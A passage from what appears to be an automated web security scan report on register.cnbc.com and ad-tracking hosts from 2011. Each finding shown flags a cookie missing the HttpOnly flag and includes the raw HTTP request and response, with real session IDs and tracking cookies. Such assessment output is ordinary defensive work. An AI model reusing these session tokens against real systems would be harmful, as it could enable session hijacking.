HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "334c-46941f222cbc0" Accept-Ranges: bytes Content-Length: 13132 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:40 GMT Connection: close Content-Type: image/jpegSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ ......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i............... ....'.. ....'.Adobe Photoshop CS3 Windows.2009:02:10 13:53:01............[SNIP]...
13.170. https://register.cnbc.com/images/tick.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/tick.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/tick.jpg HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "3a40-46941f222cbc0" Accept-Ranges: bytes Content-Length: 14912 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:40 GMT Connection: close Content-Type: image/jpegSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ ......JFIF.....H.H..... Exif..MM.*.............................b...........j.(...........1.........r.2...........i............... ....'.. ....'.Adobe Photoshop CS3 Windows.2009:03:12 10:28:37............[SNIP]...
13.171. https://register.cnbc.com/images/tile_02.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/tile_02.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/tile_02.gif HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:50 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT ETag: "2c-49fc8d80f4e80" Accept-Ranges: bytes Content-Length: 44 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:50 GMT Connection: close Content-Type: image/gifSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ GIF89a.......02;68@!.......,...........DnX.;
13.172. https://register.cnbc.com/images/wrong.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/wrong.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/wrong.jpg HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "3d8b-46941f222cbc0" Accept-Ranges: bytes Content-Length: 15755 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:40 GMT Connection: close Content-Type: image/jpegSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ ......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i............... ....'.. ....'.Adobe Photoshop CS3 Windows.2009:03:12 10:43:29............[SNIP]...
13.173. https://register.cnbc.com/js/membercenter.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/membercenter.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/membercenter.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "13eb-46941f222cbc0" Accept-Ranges: bytes Content-Length: 5099 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ //This variable is the only one that needs to be changed when the free web cam offer expires var freeWebCamOffer="false"; //var freeWebCamOffer="true"; //We need to use the db index of "United States...[SNIP]...
13.174. https://register.cnbc.com/js/prototype_ajax.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/prototype_ajax.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/prototype_ajax.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "1756a-46941f222cbc0" Accept-Ranges: bytes Content-Length: 95594 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ /* Prototype JavaScript framework, version 1.5.0 * (c) 2005-2007 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype ...[SNIP]...
13.175. https://register.cnbc.com/js/registrationBasic.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/registrationBasic.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/registrationBasic.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT ETag: "3e22-47d9ed5f8cdc0" Accept-Ranges: bytes Content-Length: 15906 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ //Field Validations - start var goOptions = true; var goAddrs1 = true; var goAddrs2 = true; var goPhone = true; var goHhi = true; var goIndustry = true; var goStDsc = true; var goCity = true;...[SNIP]...
13.176. https://register.cnbc.com/js/registrationUtils.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/registrationUtils.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/registrationUtils.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Tue, 11 Aug 2009 10:38:41 GMT ETag: "7cf-470db4e522e40" Accept-Ranges: bytes Content-Length: 1999 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ function toggleMessage(show, hide1, hide2){ var showObj = document.getElementById(show); var hideObj1 = document.getElementById(hide1); var hideObj2 = document.getElementById(hide2); hideObj1....[SNIP]...
13.177. https://register.cnbc.com/js/registrationValidations.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/registrationValidations.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/registrationValidations.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT ETag: "1dac-47d9ed5f8cdc0" Accept-Ranges: bytes Content-Length: 7596 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ //Field Validations - start var goEmail = true; var goEmailConf = true; var goPwd = true; var goPwdConf = true; var goSecQstn = true; var goSecAns = true; var goScrnNm = true; var goFrstNm = true; var...[SNIP]...
13.178. https://register.cnbc.com/js/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/s_code.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/s_code.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:51 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT ETag: "68d6-49fc8d80f4e80" Accept-Ranges: bytes Content-Length: 26838 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/ /* SiteCatalyst code version: H.2. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /* Specify the Report Suite ID(s) to track here FEBRUARY 19 2008 UPDATE NBCU CMJ...[SNIP]...
13.179. https://register.cnbc.com/js/validation.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/validation.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/validation.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 29 Jul 2009 18:48:54 GMT ETag: "184e-46fdca3891180" Accept-Ranges: bytes Content-Length: 6222 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ // JavaScript Document Validation = Class.create(); Validation.prototype = { initialize: function(parameters, timeout, controls, responsetxt ){ this.parameters = this.generateParameterList(...[SNIP]...
13.180. https://register.cnbc.com/quote-html-webservice/fvquote.htm
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/quote-html-webservice/fvquote.htm
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quote-html-webservice/fvquote.htm HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:05:48 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 231 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /quote-html-webservice/fvquote.htm was not found on t...[SNIP]...
13.181. https://register.cnbc.com/quote-html-webservice/quote.htm
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/quote-html-webservice/quote.htm
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quote-html-webservice/quote.htm HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:05:48 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 229 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /quote-html-webservice/quote.htm was not found on thi...[SNIP]...
13.182. https://register.cnbc.com/refreshlogin.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/refreshlogin.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/ HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:03:06 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header Content-Length: 0 Connection: close Content-Type: text/plainSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/
13.183. http://rt.legolas-media.com/lgrt
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://rt.legolas-media.com
Path:
/lgrt
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1 Host: rt.legolas-media.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgtix=BgABADMBSQABADMBHAAEADUBDAABADMB/QABADABXwABADMB
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:55:10 GMT Server: Apache Expires: -1 Cache-Control: no-cache; no-store Content-Type: application/javascriptSet-Cookie: lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Content-Length: 5 Connection: close true;
13.184. http://search.spotxchange.com/track/tag/6382.1008/img
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://search.spotxchange.com
Path:
/track/tag/6382.1008/img
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
